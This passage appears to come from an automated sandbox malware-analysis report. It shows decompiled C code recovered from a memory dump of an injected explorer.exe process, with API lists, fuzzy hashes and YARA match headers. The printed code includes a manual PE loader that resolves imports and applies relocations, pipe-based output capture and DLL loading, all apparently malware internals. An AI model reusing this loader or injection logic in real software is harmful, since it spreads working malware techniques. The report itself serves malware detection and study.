                            				_v92 = 0;
                            				_t126 = E00088604(0x1001);
                            				_v28 = _t126;
                            				if(_t126 == 0) {
                            					goto L18;
                            				}
                            				_push( &_v64);
                            				_push( &_v140);
                            				_t85 =  *0x9e684; // 0x286f8f0
                            				_push(0);
                            				_push(0);
                            				_push(0x8000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push(_v24);
                            				_push(0);
                            				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                            					goto L13;
                            				}
                            				_t87 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                            				_t89 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                            				_v24 = _v24 & 0;
                            				do {
                            					_t92 =  *0x9e684; // 0x286f8f0
                            					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                            					 *((char*)(_v24 + _t126)) = 0;
                            					if(_t111 == 0) {
                            						_t127 = E000891A6(_t126, 0);
                            					} else {
                            						_push(0);
                            						_push(_t126);
                            						_v32 = _t127;
                            						_t127 = E00089292(_t127);
                            						E0008861A( &_v32, 0xffffffff);
                            						_t130 = _t130 + 0x14;
                            					}
                            					_t111 = _t127;
                            					_v32 = _t127;
                            				} while (_v36 != 0);
                            				_push( &_v36);
                            				_push(E0008C379(_t127));
                            				_t98 =  *0x9e68c; // 0x286fab8
                            				_push(_t127);
                            				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                            					L12:
                            					_t100 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                            					_t102 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                            					goto L13;
                            				}
                            				_t128 = E00089256(_t127);
                            				if(_t128 == 0) {
                            					goto L12;
                            				}
                            				E0008861A( &_v32, 0);
                            				return _t128;
                            			}





































                            APIs
                            • memset.MSVCRT ref: 0008A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                            • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocateFreememset
                            • String ID: D
                            • API String ID: 2365139273-2746444292
                            • Opcode ID: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                            • Opcode Fuzzy Hash: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				void _v140;
                            				signed char _t14;
                            				char _t15;
                            				intOrPtr _t20;
                            				void* _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t32;
                            				WCHAR* _t34;
                            				intOrPtr _t35;
                            				struct HINSTANCE__* _t37;
                            				int _t38;
                            				intOrPtr _t46;
                            				void* _t47;
                            				intOrPtr _t50;
                            				void* _t60;
                            				void* _t61;
                            				char _t62;
                            				char* _t63;
                            				void* _t65;
                            				intOrPtr _t66;
                            				char _t68;
                            
                            				_t65 = __esi;
                            				_t61 = __edi;
                            				_t47 = __ebx;
                            				_t50 =  *0x9e688; // 0xb0000
                            				_t14 =  *(_t50 + 0x1898);
                            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                            					_t15 = E000895E1(_t50, 0xb62);
                            					_t66 =  *0x9e688; // 0xb0000
                            					_t62 = _t15;
                            					_t67 = _t66 + 0xb0;
                            					_v8 = _t62;
                            					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                            					_t20 =  *0x9e688; // 0xb0000
                            					asm("sbb eax, eax");
                            					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                            					_t63 = "\\";
                            					_t26 =  *0x9e688; // 0xb0000
                            					_t68 = E000892E5(_t26 + 0x1020);
                            					_v12 = _t68;
                            					E000885D5( &_v8);
                            					_t32 =  *0x9e688; // 0xb0000
                            					_t34 = E000892E5(_t32 + 0x122a);
                            					 *0x9e784 = _t34;
                            					_t35 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                            					_t37 = LoadLibraryW( *0x9e784);
                            					 *0x9e77c = _t37;
                            					if(_t37 == 0) {
                            						_t38 = 0;
                            					} else {
                            						_push(_t37);
                            						_t60 = 0x28;
                            						_t38 = E0008E171(0x9bb48, _t60);
                            					}
                            					 *0x9e780 = _t38;
                            					E0008861A( &_v12, 0xfffffffe);
                            					memset( &_v140, 0, 0x80);
                            					if( *0x9e780 != 0) {
                            						goto L10;
                            					} else {
                            						E0008861A(0x9e784, 0xfffffffe);
                            						goto L8;
                            					}
                            				} else {
                            					L8:
                            					if( *0x9e780 == 0) {
                            						_t46 =  *0x9e6bc; // 0x286fa18
                            						 *0x9e780 = _t46;
                            					}
                            					L10:
                            					return 1;
                            				}
                            			}



























                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                            • Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E00092D70(int _a4, signed int _a8) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void* __esi;
                            				void* _t137;
                            				signed int _t141;
                            				intOrPtr* _t142;
                            				signed int _t145;
                            				signed int _t146;
                            				intOrPtr _t151;
                            				intOrPtr _t161;
                            				intOrPtr _t162;
                            				intOrPtr _t167;
                            				intOrPtr _t170;
                            				signed int _t172;
                            				intOrPtr _t173;
                            				int _t184;
                            				intOrPtr _t185;
                            				intOrPtr _t188;
                            				signed int _t189;
                            				void* _t195;
                            				int _t202;
                            				int _t208;
                            				intOrPtr _t217;
                            				signed int _t218;
                            				int _t219;
                            				intOrPtr _t220;
                            				signed int _t221;
                            				signed int _t222;
                            				int _t224;
                            				int _t225;
                            				signed int _t227;
                            				intOrPtr _t228;
                            				int _t232;
                            				int _t234;
                            				signed int _t235;
                            				int _t239;
                            				void* _t240;
                            				int _t245;
                            				int _t252;
                            				signed int _t253;
                            				int _t254;
                            				void* _t257;
                            				void* _t258;
                            				int _t259;
                            				intOrPtr _t260;
                            				int _t261;
                            				signed int _t269;
                            				signed int _t271;
                            				intOrPtr* _t272;
                            				void* _t273;
                            
                            				_t253 = _a8;
                            				_t272 = _a4;
                            				_t3 = _t272 + 0xc; // 0x452bf84d
                            				_t4 = _t272 + 0x2c; // 0x8df075ff
                            				_t228 =  *_t4;
                            				_t137 =  *_t3 + 0xfffffffb;
                            				_t229 =  <=  ? _t137 : _t228;
                            				_v16 =  <=  ? _t137 : _t228;
                            				_t269 = 0;
                            				_a4 =  *((intOrPtr*)( *_t272 + 4));
                            				asm("o16 nop [eax+eax]");
                            				while(1) {
                            					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                            					_t141 =  *_t8 + 0x2a >> 3;
                            					_v12 = 0xffff;
                            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                            					if(_t217 < _t141) {
                            						break;
                            					}
                            					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t12 = _t272 + 0x5c; // 0x84e85000
                            					_t245 =  *_t11 -  *_t12;
                            					_v8 = _t245;
                            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                            					_t247 =  <  ? _t195 : _v12;
                            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                            					if(_t227 >= _v16) {
                            						L7:
                            						if(_t253 != 4) {
                            							L10:
                            							_t269 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t285 = _t227 - _t195;
                            							if(_t227 != _t195) {
                            								goto L10;
                            							} else {
                            								_t269 = _t253 - 3;
                            							}
                            						}
                            						E00095D90(_t272, _t272, 0, 0, _t269);
                            						_t18 = _t272 + 0x14; // 0xc703f045
                            						_t19 = _t272 + 8; // 0x8d000040
                            						 *( *_t18 +  *_t19 - 4) = _t227;
                            						_t22 = _t272 + 0x14; // 0xc703f045
                            						_t23 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                            						_t26 = _t272 + 0x14; // 0xc703f045
                            						_t27 = _t272 + 8; // 0x8d000040
                            						 *( *_t26 +  *_t27 - 2) =  !_t227;
                            						_t30 = _t272 + 0x14; // 0xc703f045
                            						_t31 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                            						E00094AF0(_t285,  *_t272);
                            						_t202 = _v8;
                            						_t273 = _t273 + 0x14;
                            						if(_t202 != 0) {
                            							_t208 =  >  ? _t227 : _t202;
                            							_v8 = _t208;
                            							_t36 = _t272 + 0x38; // 0xf47d8bff
                            							_t37 = _t272 + 0x5c; // 0x84e85000
                            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                            							_t273 = _t273 + 0xc;
                            							_t252 = _v8;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                            							_t227 = _t227 - _t252;
                            						}
                            						if(_t227 != 0) {
                            							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                            							_t273 = _t273 + 0xc;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                            						}
                            						_t253 = _a8;
                            						if(_t269 == 0) {
                            							continue;
                            						}
                            					} else {
                            						if(_t227 != 0 || _t253 == 4) {
                            							if(_t253 != 0 && _t227 == _t195) {
                            								goto L7;
                            							}
                            						}
                            					}
                            					break;
                            				}
                            				_t142 =  *_t272;
                            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                            				_a4 = _t232;
                            				if(_t232 == 0) {
                            					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t254 =  *_t83;
                            				} else {
                            					_t59 = _t272 + 0x2c; // 0x8df075ff
                            					_t224 =  *_t59;
                            					if(_t232 < _t224) {
                            						_t65 = _t272 + 0x3c; // 0x830cc483
                            						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t260 =  *_t66;
                            						__eflags =  *_t65 - _t260 - _t232;
                            						if( *_t65 - _t260 <= _t232) {
                            							_t67 = _t272 + 0x38; // 0xf47d8bff
                            							_t261 = _t260 - _t224;
                            							 *(_t272 + 0x6c) = _t261;
                            							memcpy( *_t67,  *_t67 + _t224, _t261);
                            							_t70 = _t272 + 0x16b0; // 0xdf750008
                            							_t188 =  *_t70;
                            							_t273 = _t273 + 0xc;
                            							_t232 = _a4;
                            							__eflags = _t188 - 2;
                            							if(_t188 < 2) {
                            								_t189 = _t188 + 1;
                            								__eflags = _t189;
                            								 *(_t272 + 0x16b0) = _t189;
                            							}
                            						}
                            						_t73 = _t272 + 0x38; // 0xf47d8bff
                            						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                            						_t225 = _a4;
                            						_t273 = _t273 + 0xc;
                            						_t76 = _t272 + 0x6c;
                            						 *_t76 =  *(_t272 + 0x6c) + _t225;
                            						__eflags =  *_t76;
                            						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t184 =  *_t78;
                            						_t79 = _t272 + 0x2c; // 0x8df075ff
                            						_t239 =  *_t79;
                            					} else {
                            						 *(_t272 + 0x16b0) = 2;
                            						_t61 = _t272 + 0x38; // 0xf47d8bff
                            						memcpy( *_t61,  *_t142 - _t224, _t224);
                            						_t62 = _t272 + 0x2c; // 0x8df075ff
                            						_t184 =  *_t62;
                            						_t273 = _t273 + 0xc;
                            						_t225 = _a4;
                            						_t239 = _t184;
                            						 *(_t272 + 0x6c) = _t184;
                            					}
                            					_t254 = _t184;
                            					 *(_t272 + 0x5c) = _t184;
                            					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                            					_t185 =  *_t81;
                            					_t240 = _t239 - _t185;
                            					_t241 =  <=  ? _t225 : _t240;
                            					_t242 = ( <=  ? _t225 : _t240) + _t185;
                            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                            				}
                            				if( *(_t272 + 0x16c0) < _t254) {
                            					 *(_t272 + 0x16c0) = _t254;
                            				}
                            				if(_t269 == 0) {
                            					_t218 = _a8;
                            					__eflags = _t218;
                            					if(_t218 == 0) {
                            						L34:
                            						_t89 = _t272 + 0x3c; // 0x830cc483
                            						_t219 =  *_t272;
                            						_t145 =  *_t89 - _t254 - 1;
                            						_a4 =  *_t272;
                            						_t234 = _t254;
                            						_v16 = _t145;
                            						_v8 = _t254;
                            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                            							_v8 = _t254;
                            							_t95 = _t272 + 0x5c; // 0x84e85000
                            							_a4 = _t219;
                            							_t234 = _t254;
                            							_t97 = _t272 + 0x2c; // 0x8df075ff
                            							__eflags =  *_t95 -  *_t97;
                            							if( *_t95 >=  *_t97) {
                            								_t98 = _t272 + 0x2c; // 0x8df075ff
                            								_t167 =  *_t98;
                            								_t259 = _t254 - _t167;
                            								_t99 = _t272 + 0x38; // 0xf47d8bff
                            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                            								 *(_t272 + 0x6c) = _t259;
                            								memcpy( *_t99, _t167 +  *_t99, _t259);
                            								_t103 = _t272 + 0x16b0; // 0xdf750008
                            								_t170 =  *_t103;
                            								_t273 = _t273 + 0xc;
                            								__eflags = _t170 - 2;
                            								if(_t170 < 2) {
                            									_t172 = _t170 + 1;
                            									__eflags = _t172;
                            									 *(_t272 + 0x16b0) = _t172;
                            								}
                            								_t106 = _t272 + 0x2c; // 0x8df075ff
                            								_t145 = _v16 +  *_t106;
                            								__eflags = _t145;
                            								_a4 =  *_t272;
                            								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                            								_t234 =  *_t108;
                            								_v8 = _t234;
                            							}
                            						}
                            						_t255 = _a4;
                            						_t220 =  *((intOrPtr*)(_a4 + 4));
                            						__eflags = _t145 - _t220;
                            						_t221 =  <=  ? _t145 : _t220;
                            						_t146 = _t221;
                            						_a4 = _t221;
                            						_t222 = _a8;
                            						__eflags = _t146;
                            						if(_t146 != 0) {
                            							_t114 = _t272 + 0x38; // 0xf47d8bff
                            							E00094C30(_t255,  *_t114 + _v8, _t146);
                            							_t273 = _t273 + 0xc;
                            							_t117 = _t272 + 0x6c;
                            							 *_t117 =  *(_t272 + 0x6c) + _a4;
                            							__eflags =  *_t117;
                            							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                            							_t234 =  *_t119;
                            						}
                            						__eflags =  *(_t272 + 0x16c0) - _t234;
                            						if( *(_t272 + 0x16c0) < _t234) {
                            							 *(_t272 + 0x16c0) = _t234;
                            						}
                            						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                            						_t123 = _t272 + 0xc; // 0x452bf84d
                            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                            						__eflags = _t257 - 0xffff;
                            						_t258 =  >  ? 0xffff : _t257;
                            						_t124 = _t272 + 0x2c; // 0x8df075ff
                            						_t151 =  *_t124;
                            						_t125 = _t272 + 0x5c; // 0x84e85000
                            						_t235 = _t234 -  *_t125;
                            						__eflags = _t258 - _t151;
                            						_t152 =  <=  ? _t258 : _t151;
                            						__eflags = _t235 - ( <=  ? _t258 : _t151);
                            						if(_t235 >= ( <=  ? _t258 : _t151)) {
                            							L49:
                            							__eflags = _t235 - _t258;
                            							_t154 =  >  ? _t258 : _t235;
                            							_a4 =  >  ? _t258 : _t235;
                            							__eflags = _t222 - 4;
                            							if(_t222 != 4) {
                            								L53:
                            								_t269 = 0;
                            								__eflags = 0;
                            							} else {
                            								_t161 =  *_t272;
                            								__eflags =  *(_t161 + 4);
                            								_t154 = _a4;
                            								if( *(_t161 + 4) != 0) {
                            									goto L53;
                            								} else {
                            									__eflags = _t154 - _t235;
                            									if(_t154 != _t235) {
                            										goto L53;
                            									} else {
                            										_t269 = _t222 - 3;
                            									}
                            								}
                            							}
                            							_t131 = _t272 + 0x38; // 0xf47d8bff
                            							_t132 = _t272 + 0x5c; // 0x84e85000
                            							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                            							_t134 = _t272 + 0x5c;
                            							 *_t134 =  *(_t272 + 0x5c) + _a4;
                            							__eflags =  *_t134;
                            							E00094AF0( *_t134,  *_t272);
                            						} else {
                            							__eflags = _t235;
                            							if(_t235 != 0) {
                            								L46:
                            								__eflags = _t222;
                            								if(_t222 != 0) {
                            									_t162 =  *_t272;
                            									__eflags =  *(_t162 + 4);
                            									if( *(_t162 + 4) == 0) {
                            										__eflags = _t235 - _t258;
                            										if(_t235 <= _t258) {
                            											goto L49;
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _t222 - 4;
                            								if(_t222 == 4) {
                            									goto L46;
                            								}
                            							}
                            						}
                            						asm("sbb edi, edi");
                            						_t271 =  ~_t269 & 0x00000002;
                            						__eflags = _t271;
                            						return _t271;
                            					} else {
                            						__eflags = _t218 - 4;
                            						if(_t218 == 4) {
                            							goto L34;
                            						} else {
                            							_t173 =  *_t272;
                            							__eflags =  *(_t173 + 4);
                            							if( *(_t173 + 4) != 0) {
                            								goto L34;
                            							} else {
                            								_t88 = _t272 + 0x5c; // 0x84e85000
                            								__eflags = _t254 -  *_t88;
                            								if(_t254 !=  *_t88) {
                            									goto L34;
                            								} else {
                            									return 1;
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					return 3;
                            				}
                            			}


                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 52%
                            			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed short _v12;
                            				intOrPtr* _v16;
                            				signed int* _v20;
                            				intOrPtr _v24;
                            				unsigned int _v28;
                            				signed short* _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr* _v40;
                            				signed short* _v44;
                            				intOrPtr _v48;
                            				unsigned int _v52;
                            				intOrPtr _v56;
                            				_Unknown_base(*)()* _v60;
                            				signed int _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				unsigned int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				signed int _t149;
                            				void* _t189;
                            				signed int _t194;
                            				signed int _t196;
                            				intOrPtr _t236;
                            
                            				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            				_v24 = _v72;
                            				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                            				_v56 = _t236;
                            				if(_t236 == 0) {
                            					L13:
                            					while(0 != 0) {
                            					}
                            					_push(8);
                            					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                            						L35:
                            						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                            						while(0 != 0) {
                            						}
                            						if(_a12 != 0) {
                            							 *_a12 = _v68;
                            						}
                            						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                            						return _v68(_a4, 1, _a8);
                            					}
                            					_v84 = 0x80000000;
                            					_t149 = 8;
                            					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						if(_v36 == 0) {
                            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						}
                            						if(_v36 != 0) {
                            							if( *_v16 == 0) {
                            								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                            							} else {
                            								_v20 =  *_v16 + _a4;
                            							}
                            							_v64 = _v64 & 0x00000000;
                            							while( *_v20 != 0) {
                            								if(( *_v20 & _v84) == 0) {
                            									_v88 =  *_v20 + _a4;
                            									_v60 = GetProcAddress(_v36, _v88 + 2);
                            								} else {
                            									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                            								}
                            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                            									 *_v20 = _v60;
                            								} else {
                            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                            								}
                            								_v20 =  &(_v20[1]);
                            								_v64 = _v64 + 4;
                            							}
                            							_v16 = _v16 + 0x14;
                            							continue;
                            						} else {
                            							_t189 = 0xfffffffd;
                            							return _t189;
                            						}
                            					}
                            					goto L35;
                            				}
                            				_t194 = 8;
                            				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                            				_t196 = 8;
                            				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                            				while(0 != 0) {
                            				}
                            				while(_v48 > 0) {
                            					_v28 = _v44[2];
                            					_v48 = _v48 - _v28;
                            					_v28 = _v28 - 8;
                            					_v28 = _v28 >> 1;
                            					_v32 =  &(_v44[4]);
                            					_v80 = _a4 +  *_v44;
                            					_v52 = _v28;
                            					while(1) {
                            						_v76 = _v52;
                            						_v52 = _v52 - 1;
                            						if(_v76 == 0) {
                            							break;
                            						}
                            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                            						_v12 =  *_v32 & 0xfff;
                            						_v40 = (_v12 & 0x0000ffff) + _v80;
                            						if((_v5 & 0x000000ff) != 3) {
                            							if((_v5 & 0x000000ff) == 0xa) {
                            								 *_v40 =  *_v40 + _v56;
                            							}
                            						} else {
                            							 *_v40 =  *_v40 + _v56;
                            						}
                            						_v32 =  &(_v32[1]);
                            					}
                            					_v44 = _v32;
                            				}
                            				goto L13;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                            • LoadLibraryA.KERNEL32(?), ref: 00092C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                            • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				void* _t13;
                            				intOrPtr _t15;
                            				signed int _t16;
                            				intOrPtr _t17;
                            				signed int _t18;
                            				char _t20;
                            				intOrPtr _t22;
                            				void* _t23;
                            				void* _t24;
                            				intOrPtr _t29;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t43;
                            				intOrPtr _t48;
                            				void* _t51;
                            				signed int _t61;
                            				signed int _t64;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t61 = __ecx;
                            				_t41 =  *0x9e6dc; // 0x1d8
                            				_t13 = E0008A4BF(_t41, 0);
                            				while(_t13 < 0) {
                            					E0008980C( &_v28);
                            					_t43 =  *0x9e6e0; // 0x0
                            					_t15 =  *0x9e6e4; // 0x0
                            					_t41 = _t43 + 0xe10;
                            					asm("adc eax, ebx");
                            					__eflags = _t15 - _v24;
                            					if(__eflags > 0) {
                            						L9:
                            						_t16 = 0xfffffffe;
                            						L13:
                            						return _t16;
                            					}
                            					if(__eflags < 0) {
                            						L4:
                            						_t17 =  *0x9e684; // 0x286f8f0
                            						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                            						__eflags = _t18;
                            						if(_t18 == 0) {
                            							break;
                            						}
                            						_t35 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                            						_t41 =  *0x9e6dc; // 0x1d8
                            						__eflags = 0;
                            						_t13 = E0008A4BF(_t41, 0);
                            						continue;
                            					}
                            					__eflags = _t41 - _v28;
                            					if(_t41 >= _v28) {
                            						goto L9;
                            					}
                            					goto L4;
                            				}
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t20 =  *0x9e6e8; // 0x286ffa8
                            				_v28 = _t20;
                            				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                            				_v20 = _t22;
                            				if(_t22 != 0) {
                            					_t23 = GetCurrentProcess();
                            					_t24 = GetCurrentThread();
                            					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                            					E0008980C(0x9e6e0);
                            					_t64 = E00081A1B( &_v28, E00081226, _t71);
                            					__eflags = _t64;
                            					if(_t64 >= 0) {
                            						_push(0);
                            						_push( *0x9e760);
                            						_t51 = 0x27;
                            						E00089F06(_t51);
                            					}
                            				} else {
                            					_t64 = _t61 | 0xffffffff;
                            				}
                            				_t29 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                            				_t48 =  *0x9e6dc; // 0x1d8
                            				 *0x9e6d0 = 0;
                            				E0008A4DB(_t48);
                            				E0008861A( &_v24, 0);
                            				_t16 = _t64;
                            				goto L13;
                            			}

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                            • Opcode Fuzzy Hash: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00081B2D(void* __eflags, void* __fp0) {
